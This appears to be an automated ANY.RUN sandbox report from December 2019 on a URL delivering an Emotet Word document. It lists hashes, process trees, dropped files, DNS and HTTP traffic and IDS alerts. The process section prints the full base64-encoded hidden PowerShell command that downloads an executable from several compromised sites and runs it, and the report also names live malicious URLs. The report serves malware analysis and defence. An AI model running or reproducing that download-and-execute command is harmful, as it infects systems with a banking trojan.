analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
URL:

http://charger-battery.co.uk:80/chargerimages/Reporting/

Full analysis: https://app.any.run/tasks/f1b5b138-529c-419b-8638-cbd36bdbb5fa
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Analysis date: December 06, 2019, 17:31:32
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
emotet-doc
emotet
opendir
Indicators:
MD5:

B800109CABF4B947413D0B2CFF1F3F0F

SHA1:

901736FC7C2A8CAF65172264CC90523ADC82CF36

SHA256:

F40D24B2648FE1DCD782E53DB7AB804838CE15AA6E14EC46F098E5AE33C2C5EE

SSDEEP:

3:N1KdNESyIAGQQO1++f3K:CsIjQQOE+f6

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Drops known malicious document

      • iexplore.exe (PID: 2308)
      • WINWORD.EXE (PID: 2928)
  • SUSPICIOUS

    • Starts Microsoft Office Application

      • iexplore.exe (PID: 2108)
      • WINWORD.EXE (PID: 2928)
    • Application launched itself

      • WINWORD.EXE (PID: 2928)
    • PowerShell script executed

      • powershell.exe (PID: 2300)
    • Creates files in the user directory

      • powershell.exe (PID: 2300)
    • Executed via WMI

      • powershell.exe (PID: 2300)
  • INFO

    • Reads Internet Cache Settings

      • iexplore.exe (PID: 2308)
    • Creates files in the user directory

      • iexplore.exe (PID: 2108)
      • iexplore.exe (PID: 2308)
      • WINWORD.EXE (PID: 2928)
    • Application launched itself

      • iexplore.exe (PID: 2108)
    • Changes internet zones settings

      • iexplore.exe (PID: 2108)
    • Reads internet explorer settings

      • iexplore.exe (PID: 2308)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 2928)
      • WINWORD.EXE (PID: 320)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
40
Monitored processes
5
Malicious processes
3
Suspicious processes
1

Behavior graph

Click at the process to see the details
start iexplore.exe iexplore.exe winword.exe no specs winword.exe no specs powershell.exe

Process information

PID
CMD
Path
Indicators
Parent process
2108"C:\Program Files\Internet Explorer\iexplore.exe" -nohomeC:\Program Files\Internet Explorer\iexplore.exe
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Internet Explorer
Exit code:
1
Version:
8.00.7600.16385 (win7_rtm.090713-1255)
2308"C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:2108 CREDAT:71937C:\Program Files\Internet Explorer\iexplore.exe
iexplore.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Internet Explorer
Exit code:
0
Version:
8.00.7600.16385 (win7_rtm.090713-1255)
2928"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\WNRAIOCL\A_PL1559557453WQ[1].doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEiexplore.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
320"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /EmbeddingC:\Program Files\Microsoft Office\Office14\WINWORD.EXEWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Microsoft Word
Exit code:
0
Version:
14.0.6024.1000
2300powershell -w hidden -en JABYAGgAZABlAGQAYQBiAHoAbgB1AGEAYQA9ACcAVwB4AGcAaQBiAHcAYwBuAHgAdwAnADsAJABLAHkAcgB1AGIAdQBxAGsAbgB0ACAAPQAgACcANAA3ACcAOwAkAEoAYgByAGYAaABuAGwAcwBnAGcAbAByAD0AJwBZAHYAcQB4AHIAeQBzAHkAdABkAGYAJwA7ACQAQgBzAGEAdABjAHEAbgBqAHAAdgBuAG8APQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAEsAeQByAHUAYgB1AHEAawBuAHQAKwAnAC4AZQB4AGUAJwA7ACQATwBrAGsAaABkAG8AZgByAHkAdgA9ACcATQBrAHEAcQBxAHUAcQBuAGoAZQBzAGcAJwA7ACQAWQB5AGEAbQBzAGEAZQB4AGcAcQBpAD0AJgAoACcAbgAnACsAJwBlACcAKwAnAHcALQBvAGIAagBlAGMAdAAnACkAIABOAGUAVAAuAFcAZQBiAEMATABpAEUATgB0ADsAJABVAHAAeQB4AG0AdgBmAHMAcABuAGIAdQA9ACcAaAB0AHQAcAA6AC8ALwByAG0AYwBlAG4AdAByAGUALgBiAGkAZwBmAGkAbABtAHAAcgBvAGQAdQBjAHQAaQBvAG4ALgBjAG8AbQAvAHcAcAAtAGkAbgBjAGwAdQBkAGUAcwAvAEwAcgBPAHEAaAAvACoAaAB0AHQAcAA6AC8ALwBsAGUAYwBhAGQAZQBhAHUAZwBvAHUAcgBtAGEAbgBkAC4AZgByAC8ANAA3AG0AbgAwADQALwBvAFMAOABEAGsAVgAvACoAaAB0AHQAcAA6AC8ALwBkAGEAdABuAGUAbgB0AGEAeQBoAGEAbgBvAGkALgBpAG4AZgBvAC8AdwBwAC0AaQBuAGMAbAB1AGQAZQBzAC8AcAB5AFoAcgBkAGQAZwAvACoAaAB0AHQAcAA6AC8ALwBiAGkAZQB0AHQAaAB1AHYAaQBuAGgAbwBtAGUAcwBnAGkAYQBsAGEAbQAuAHgAeQB6AC8AYwBnAGkALQBiAGkAbgAvAGEAYwBCADQAcQA0AHkALwAqAGgAdAB0AHAAOgAvAC8AYwBsAGkAYwBrAGIAYQBuAGsAYgByAGUAYQBrAHMAdABoAGUAaQBuAHQAZQByAG4AZQB0AC4AYwBvAG0ALwBvAEEANgBlAG4ASQA4AC8AJwAuACIAUwBwAGAATABJAHQAIgAoACcAKgAnACkAOwAkAFEAYwBsAGkAbwBhAHAAZQB3AGkAPQAnAEkAZABoAHYAYQB6AGEAZQBmAG4AYgBoAGMAJwA7AGYAbwByAGUAYQBjAGgAKAAkAEsAaAB3AGQAbwBsAGEAdwBoAHUAcwBqAHYAIABpAG4AIAAkAFUAcAB5AHgAbQB2AGYAcwBwAG4AYgB1ACkAewB0AHIAeQB7ACQAWQB5AGEAbQBzAGEAZQB4AGcAcQBpAC4AIgBEAG8AYAB3AG4AYABsAE8AYABBAEQAZgBpAEwARQAiACgAJABLAGgAdwBkAG8AbABhAHcAaAB1AHMAagB2ACwAIAAkAEIAcwBhAHQAYwBxAG4AagBwAHYAbgBvACkAOwAkAEUAegBrAHIAZABpAHQAeABkAGcAcQA9ACcARQBoAG8AaQB1AHMAbQBuAGYAbgBkACcAOwBJAGYAIAAoACgALgAoACcARwBlAHQAJwArACcALQAnACsAJwBJAHQAZQBtACcAKQAgACQAQgBzAGEAdABjAHEAbgBqAHAAdgBuAG8AKQAuACIAbABlAG4ARwBgAFQAaAAiACAALQBnAGUAIAAzADQANwAxADYAKQAgAHsAWwBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6ACIAUwB0AEEAYABSAHQAIgAoACQAQgBzAGEAdABjAHEAbgBqAHAAdgBuAG8AKQA7ACQARQBkAGEAZABmAGYAbABrAGYAbABxAHMAPQAnAEYAZQBwAGoAcgBsAHoAeAB5AHQAbQAnADsAYgByAGUAYQBrADsAJABCAHkAbABnAHkAeABuAHAAdABjAGMAbABjAD0AJwBDAGQAcgBjAGMAeABoAGIAeQB1AGIAdQAnAH0AfQBjAGEAdABjAGgAewB9AH0AJABFAGgAcgB1AGoAagBtAHQAZQA9ACcAQwB6AGwAYwBuAHkAcABoAGYAdQB2AGIAJwA=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
wmiprvse.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
3 046
Read events
2 155
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
6
Text files
9
Unknown types
14

Dropped files

PID
Process
Filename
Type
2108iexplore.exeC:\Users\admin\AppData\Local\Temp\~DF76F5C577F6816886.TMP
MD5:
SHA256:
2928WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVRD869.tmp.cvr
MD5:
SHA256:
2928WINWORD.EXEC:\Users\admin\AppData\Local\Temp\OICE_FC75D877-9296-42EB-B337-4BED11B742E5.0\2598736D.doc\:Zone.Identifier:$DATA
MD5:
SHA256:
320WINWORD.EXEC:\Users\admin\AppData\Local\Temp\OICE_FC75D877-9296-42EB-B337-4BED11B742E5.0\EC3CE65F.wmf
MD5:
SHA256:
320WINWORD.EXEC:\Users\admin\AppData\Local\Temp\OICE_FC75D877-9296-42EB-B337-4BED11B742E5.0\C2288CD4.wmf
MD5:
SHA256:
320WINWORD.EXEC:\Users\admin\AppData\Local\Temp\OICE_FC75D877-9296-42EB-B337-4BED11B742E5.0\C4DF9EC5.wmf
MD5:
SHA256:
320WINWORD.EXEC:\Users\admin\AppData\Local\Temp\OICE_FC75D877-9296-42EB-B337-4BED11B742E5.0\99DA8E02.wmf
MD5:
SHA256:
320WINWORD.EXEC:\Users\admin\AppData\Local\Temp\OICE_FC75D877-9296-42EB-B337-4BED11B742E5.0\C2E0021B.wmf
MD5:
SHA256:
320WINWORD.EXEC:\Users\admin\AppData\Local\Temp\OICE_FC75D877-9296-42EB-B337-4BED11B742E5.0\5AD9DD60.wmf
MD5:
SHA256:
2928WINWORD.EXEC:\Users\admin\AppData\Local\Temp\OICE_FC75D877-9296-42EB-B337-4BED11B742E5.0\2598736D.docdocument
MD5:104A284B4D449DBE9A0AD511FEC86D08
SHA256:91D11517737F47E430BF2066D287F14A1D89FF5A572D9219081033B1D9FE0A2F
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
1
TCP/UDP connections
3
DNS requests
3
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2300
powershell.exe
GET
206.221.182.74:80
http://rmcentre.bigfilmproduction.com/wp-includes/LrOqh/
US
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2108
iexplore.exe
204.79.197.200:80
www.bing.com
Microsoft Corporation
US
whitelisted
2308
iexplore.exe
67.20.123.115:80
charger-battery.co.uk
Unified Layer
US
unknown
2300
powershell.exe
206.221.182.74:80
rmcentre.bigfilmproduction.com
Choopa, LLC
US
malicious

DNS requests

Domain
IP
Reputation
www.bing.com
  • 204.79.197.200
  • 13.107.21.200
whitelisted
charger-battery.co.uk
  • 67.20.123.115
unknown
rmcentre.bigfilmproduction.com
  • 206.221.182.74
malicious

Threats

PID
Process
Class
Message
2300
powershell.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
2300
powershell.exe
Potentially Bad Traffic
ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
2300
powershell.exe
Misc activity
ET INFO EXE - Served Attached HTTP
No debug info